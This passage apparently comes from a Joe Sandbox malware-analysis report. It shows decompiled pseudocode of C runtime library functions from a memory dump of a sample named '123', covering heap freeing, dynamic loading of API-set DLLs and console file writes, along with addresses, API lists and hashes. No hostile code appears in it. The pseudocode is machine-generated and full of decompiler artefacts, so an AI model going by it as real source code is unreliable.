											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E001AB3FB(__eflags, _v704, 1, 0x1b7188, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00199981( &_v528,  *0x1c3194, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x1b7210; // 0x1970d1
									 *0x1b4134(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x1c3268;
										if(_t232 == 0x1c3268) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E001A71B2( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E001A71B2( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E001A71B2( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E001A71B2( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E001A71B2(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E00197F14(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x001a435d
0x001a4368
0x001a436f
0x001a4372
0x001a4373
0x001a4376
0x001a437a
0x001a437b
0x001a437e
0x001a438e
0x001a43b1
0x001a43b6
0x001a43bb
0x001a4671
0x001a4671
0x001a4671
0x00000000
0x001a43c1
0x001a43c1
0x001a43c4
0x001a43c7
0x001a43cd
0x001a43d3
0x001a43d6
0x001a43d8
0x001a43db
0x001a43e5
0x001a43eb
0x00000000
0x00000000
0x001a43f1
0x001a441a
0x001a441a
0x001a43f3
0x001a43f3
0x001a43fb
0x001a4402
0x001a4408
0x00000000
0x001a440a
0x001a440a
0x001a440d
0x001a4418
0x00000000
0x00000000
0x00000000
0x00000000
0x001a4418
0x001a4408
0x001a4427
0x001a4429
0x001a4432
0x001a4438
0x001a443b
0x001a443b
0x001a443e
0x001a4441
0x001a4441
0x001a4451
0x001a445f
0x001a4464
0x001a446b
0x001a446d
0x00000000
0x001a4473
0x001a4479
0x001a4486
0x001a448f
0x001a4495
0x001a44a2
0x001a44a9
0x001a44ae
0x001a44b1
0x001a44b3
0x001a46f1
0x001a46f7
0x001a46f8
0x001a46f9
0x001a46fa
0x001a46fb
0x001a46fc
0x001a4701
0x001a4704
0x001a4707
0x001a4708
0x001a471a
0x001a471f
0x001a4721
0x001a472a
0x00000000
0x001a472a
0x001a4723
0x001a4726
0x001a4728
0x00000000
0x00000000
0x001a4730
0x001a44b9
0x001a44b9
0x001a44c7
0x001a44ca
0x001a44e0
0x001a44e7
0x001a44ec
0x001a44cc
0x001a44cc
0x001a44d4
0x00000000
0x001a44d6
0x001a44d6
0x001a44dc
0x001a44dc
0x001a44d4
0x001a44f3
0x001a44fa
0x001a44fd
0x001a45fb
0x001a45fe
0x001a460b
0x001a460e
0x001a4616
0x001a4616
0x001a4600
0x001a4606
0x001a4606
0x001a4503
0x001a4503
0x001a450f
0x001a4515
0x001a451b
0x001a451e
0x001a4524
0x001a4527
0x001a452a
0x00000000
0x00000000
0x001a452c
0x001a4535
0x001a4539
0x001a4542
0x001a4546
0x001a4547
0x001a454d
0x001a4553
0x001a4559
0x001a455c
0x00000000
0x00000000
0x001a455e
0x001a457d
0x001a457d
0x001a4580
0x001a459d
0x001a45a2
0x001a45a5
0x001a45a7
0x001a45e5
0x001a45a9
0x001a45a9
0x001a45af
0x001a45b4
0x001a45bc
0x001a45bd
0x001a45bd
0x001a45d4
0x001a45db
0x001a45de
0x001a45e0
0x001a45e0
0x001a45eb
0x001a45f1
0x001a45f1
0x001a45f6
0x00000000
0x001a45f6
0x001a4560
0x001a4562
0x001a4567
0x001a456d
0x001a4576
0x001a4579
0x001a4579
0x00000000
0x001a4562
0x001a4619
0x001a4619
0x001a461d
0x001a4625
0x001a462b
0x001a462e
0x001a4634
0x001a4636
0x001a4682
0x001a4688
0x001a46d4
0x001a46d4
0x001a468a
0x001a468f
0x001a468f
0x001a4695
0x001a4699
0x00000000
0x001a469b
0x001a469f
0x001a46a8
0x001a46b4
0x001a46b9
0x001a46c2
0x001a46c8
0x001a46cb
0x001a46cb
0x001a4699
0x001a46da
0x001a46e2
0x001a46e8
0x001a46eb
0x001a4638
0x001a463e
0x001a4648
0x001a465a
0x001a4661
0x001a466e
0x00000000
0x001a466e
0x00000000
0x001a4636
0x001a44b3
0x001a442b
0x001a442b
0x001a4673
0x001a4676
0x001a4677
0x001a467a
0x001a4681
0x001a4681
0x00000000
0x001a4429
0x001a4422
0x001a4424
0x001a4424
0x00000000
0x001a4424
0x00000000

APIs

Part of subcall function 001A5D71: GetLastError.KERNEL32(?,00000000,?,0019D1A2,00000000,00000000,?,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5D76
Part of subcall function 001A5D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5E14

_free.LIBCMT ref: 001A4648
_free.LIBCMT ref: 001A4661
_free.LIBCMT ref: 001A469F
_free.LIBCMT ref: 001A46A8
_free.LIBCMT ref: 001A46B4

Strings

C, xrefs: 001A44B9

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 3b0d497cace0d931cfb6faca0f7c3cfdb0c75f35f05db3043bf3543ba08034f7
Instruction ID: 627a3cbb4e0251084f11e6657b53ae7b56c1c8f858a0f77421a1ccea35eff583
Opcode Fuzzy Hash: 3b0d497cace0d931cfb6faca0f7c3cfdb0c75f35f05db3043bf3543ba08034f7
Instruction Fuzzy Hash: FBB15B799016199FDB24DF18C884BADB7B5FF9A304F5085AEE849A7350E770AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001A8153 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001A8153(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x1f0d38 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x1b7c10 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E001A5868(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E001A5868(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x001a815c
0x001a8206
0x001a8164
0x001a8166
0x001a816d
0x001a816f
0x001a8175
0x001a8182
0x001a8197
0x001a819b
0x001a81ed
0x001a81ed
0x001a81f2
0x001a81f6
0x001a81f9
0x001a81f9
0x001a81ff
0x001a8201
0x001a8216
0x001a8211
0x001a8215
0x001a8215
0x001a8203
0x001a8203
0x00000000
0x001a8203
0x001a819d
0x001a81a6
0x001a81dd
0x001a81dd
0x001a81df
0x001a81e1
0x00000000
0x00000000
0x001a81e9
0x00000000
0x001a81e9
0x001a81b0
0x001a81b5
0x001a81ba
0x00000000
0x00000000
0x001a81c4
0x001a81c9
0x001a81ce
0x00000000
0x00000000
0x001a81d3
0x001a81d9
0x00000000
0x001a81d9
0x001a817a
0x00000000
0x00000000
0x00000000
0x001a8180
0x001a820f
0x00000000

Strings

api-ms-, xrefs: 001A81AA
ext-ms-, xrefs: 001A81BE

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 0673e974f0e2c97c71183eca3988f8b7bc4a606d603fe093f0b3c8c05254a4d1
Instruction ID: a5a3377b7acdc09b8c60c94d387eaf983b19ae7ca0b9e0664b83b02af67a0a2e
Opcode Fuzzy Hash: 0673e974f0e2c97c71183eca3988f8b7bc4a606d603fe093f0b3c8c05254a4d1
Instruction Fuzzy Hash: C1212739A05620BFCB21AB699C45B6A3768AF02BA0F250621FD05A7291DF30DD01C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 001AE5F6 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001AE5F6(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E001AE342(_t45, 7);
					E001AE342(_t45 + 0x1c, 7);
					E001AE342(_t45 + 0x38, 0xc);
					E001AE342(_t45 + 0x68, 0xc);
					E001AE342(_t45 + 0x98, 2);
					E001A71B2( *((intOrPtr*)(_t45 + 0xa0)));
					E001A71B2( *((intOrPtr*)(_t45 + 0xa4)));
					E001A71B2( *((intOrPtr*)(_t45 + 0xa8)));
					E001AE342(_t45 + 0xb4, 7);
					E001AE342(_t45 + 0xd0, 7);
					E001AE342(_t45 + 0xec, 0xc);
					E001AE342(_t45 + 0x11c, 0xc);
					E001AE342(_t45 + 0x14c, 2);
					E001A71B2( *((intOrPtr*)(_t45 + 0x154)));
					E001A71B2( *((intOrPtr*)(_t45 + 0x158)));
					E001A71B2( *((intOrPtr*)(_t45 + 0x15c)));
					return E001A71B2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x001ae5fc
0x001ae601
0x001ae60a
0x001ae615
0x001ae620
0x001ae62b
0x001ae639
0x001ae644
0x001ae64f
0x001ae65a
0x001ae668
0x001ae676
0x001ae687
0x001ae695
0x001ae6a3
0x001ae6ae
0x001ae6b9
0x001ae6c4
0x00000000
0x001ae6d4
0x001ae6d9

APIs

Part of subcall function 001AE342: _free.LIBCMT ref: 001AE367

_free.LIBCMT ref: 001AE644

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

_free.LIBCMT ref: 001AE64F
_free.LIBCMT ref: 001AE65A
_free.LIBCMT ref: 001AE6AE
_free.LIBCMT ref: 001AE6B9
_free.LIBCMT ref: 001AE6C4
_free.LIBCMT ref: 001AE6CF

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a9067732414abe17cf0dff08c6af52c8b8bf21cfa09375f2dd65cc90ce90c9e1
Instruction ID: a9e1303effad9d1fa00a8013ffd1227ad73029c3c5579e62bd883e35575f7274
Opcode Fuzzy Hash: a9067732414abe17cf0dff08c6af52c8b8bf21cfa09375f2dd65cc90ce90c9e1
Instruction Fuzzy Hash: 89116D3D545B04AAD930BBB0CC47FEB77DD6F62701F848C14F29A67093DB29BA494650

Uniqueness

Uniqueness Score: -1.00%

Function 001A9E5F Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E001A9E5F(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x1c3014; // 0x88921fa2
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x1f0e18 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E0019D162( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x1f0e18 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x1c3970; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x1f0e18 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E001B09F7( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x1c3970)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x1f0e18 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00198BD0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x1f0e18 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E001B09F7( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E001AC142(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E001A1D06(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t202 =  &(_t269[1]);
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x1f0e18 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x1f0e18 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x1f0e18 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E001A9194( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E001A9194();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00197F14(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x001a9e6a
0x001a9e71
0x001a9e74
0x001a9e7c
0x001a9e7f
0x001a9e8c
0x001a9e8f
0x001a9e92
0x001a9e99
0x001a9ea1
0x001a9ea4
0x001a9ea7
0x001a9ead
0x001a9eaf
0x001a9eb6
0x001a9ec0
0x001a9ec2
0x001a9ec5
0x001a9ec8
0x001a9ecb
0x001a9ece
0x001a9ed1
0x001a9ed7
0x001aa1e2
0x001aa1e2
0x00000000
0x001a9edd
0x001a9ee5
0x001a9ee8
0x001a9eee
0x001a9ef1
0x001a9ef8
0x001a9eff
0x001a9f02
0x00000000
0x00000000
0x001a9f0b
0x001a9f10
0x001a9f12
0x001a9f15
0x001a9f1a
0x001a9f1e
0x00000000
0x00000000
0x00000000
0x001a9f1e
0x001a9f23
0x001a9f25
0x001a9f2a
0x001a9fe4
0x001a9feb
0x001a9fec
0x001a9fef
0x001a9ff1
0x001aa195
0x001aa197
0x00000000
0x001aa199
0x001aa199
0x001aa19c
0x001aa1ab
0x001aa1af
0x001aa1b0
0x001aa1b0
0x00000000
0x001aa1b4
0x001a9ff7
0x001a9ff9
0x001a9fff
0x001aa002
0x001aa00e
0x001aa017
0x001aa022
0x001aa027
0x001aa02a
0x001aa02d
0x00000000
0x001aa033
0x001aa033
0x00000000
0x001aa033
0x001aa02d
0x001a9f30
0x001a9f3f
0x001a9f40
0x001a9f43
0x001a9f46
0x001a9f4b
0x001aa161
0x001aa163
0x001aa165
0x001aa167
0x001aa171
0x001aa179
0x001aa17b
0x001aa17c
0x001aa180
0x001aa183
0x001aa183
0x001aa187
0x001aa187
0x001aa187
0x001aa18a
0x001aa18a
0x001aa18a
0x001aa18c
0x001aa18c
0x001aa190
0x001a9f51
0x001a9f51
0x001a9f54
0x001a9f56
0x001a9f59
0x001a9f5c
0x001a9f60
0x001a9f61
0x001a9f65
0x001a9f68
0x001a9f6d
0x001a9f77
0x001a9f7c
0x001a9f7f
0x001a9f82
0x001a9f82
0x001a9f85
0x001a9f88
0x001a9f8a
0x001a9f93
0x001a9f97
0x001a9f98
0x001a9f9c
0x001a9fa2
0x001a9fab
0x001a9fb8
0x001a9fbf
0x001a9fc3
0x001a9fce
0x001a9fd3
0x001a9fd9
0x00000000
0x001a9fdf
0x001aa036
0x001aa037
0x001aa0ba
0x001aa0c1
0x001aa0c9
0x001aa0d1
0x001aa0d6
0x001aa0d9
0x001aa0de
0x00000000
0x001aa0e4
0x001aa0f9
0x001aa1d9
0x001aa1df
0x00000000
0x001aa0ff
0x001aa108
0x001aa10a
0x001aa110
0x00000000
0x001aa116
0x001aa11a
0x001aa150
0x001aa153
0x00000000
0x001aa159
0x001aa159
0x00000000
0x001aa159
0x001aa11c
0x001aa11e
0x001aa120
0x001aa139
0x00000000
0x001aa13f
0x001aa143
0x00000000
0x001aa149
0x001aa149
0x001aa14c
0x001aa14d
0x00000000
0x001aa14d
0x001aa143
0x001aa139
0x001aa11a
0x001aa110
0x001aa0f9
0x001aa0de
0x001a9fd9
0x001a9f4b
0x00000000
0x001aa03b
0x001aa03b
0x001aa03f
0x001aa042
0x001aa064
0x001aa067
0x001aa06c
0x001aa070
0x001aa074
0x001aa0a2
0x001aa0a4
0x00000000
0x001aa076
0x001aa076
0x001aa079
0x001aa07c
0x001aa07f
0x001aa1b6
0x001aa1b9
0x001aa1bc
0x001aa1c6
0x001aa1d1
0x001aa1d6
0x00000000
0x001aa085
0x001aa08c
0x001aa091
0x001aa094
0x001aa097
0x00000000
0x001aa09d
0x001aa09d
0x00000000
0x001aa09d
0x001aa097
0x001aa07f
0x001aa044
0x001aa048
0x001aa04b
0x001aa050
0x001aa056
0x001aa058
0x001aa05f
0x001aa0a5
0x001aa0a8
0x001aa0a9
0x001aa0ae
0x001aa0b1
0x001aa0b4
0x00000000
0x00000000
0x00000000
0x00000000
0x001aa0b4
0x00000000
0x001aa042
0x001a9edd
0x001aa1e5
0x001aa1e5
0x001aa1e7
0x001aa1ea
0x001aa1ea
0x001aa1ea
0x001aa1ea
0x001aa1fc
0x001aa1fe
0x001aa1ff
0x001aa200
0x001aa20a

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 001A9EA7
__fassign.LIBCMT ref: 001AA08C
__fassign.LIBCMT ref: 001AA0A9
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001AA0F1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001AA131
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001AA1D9

Memory Dump Source

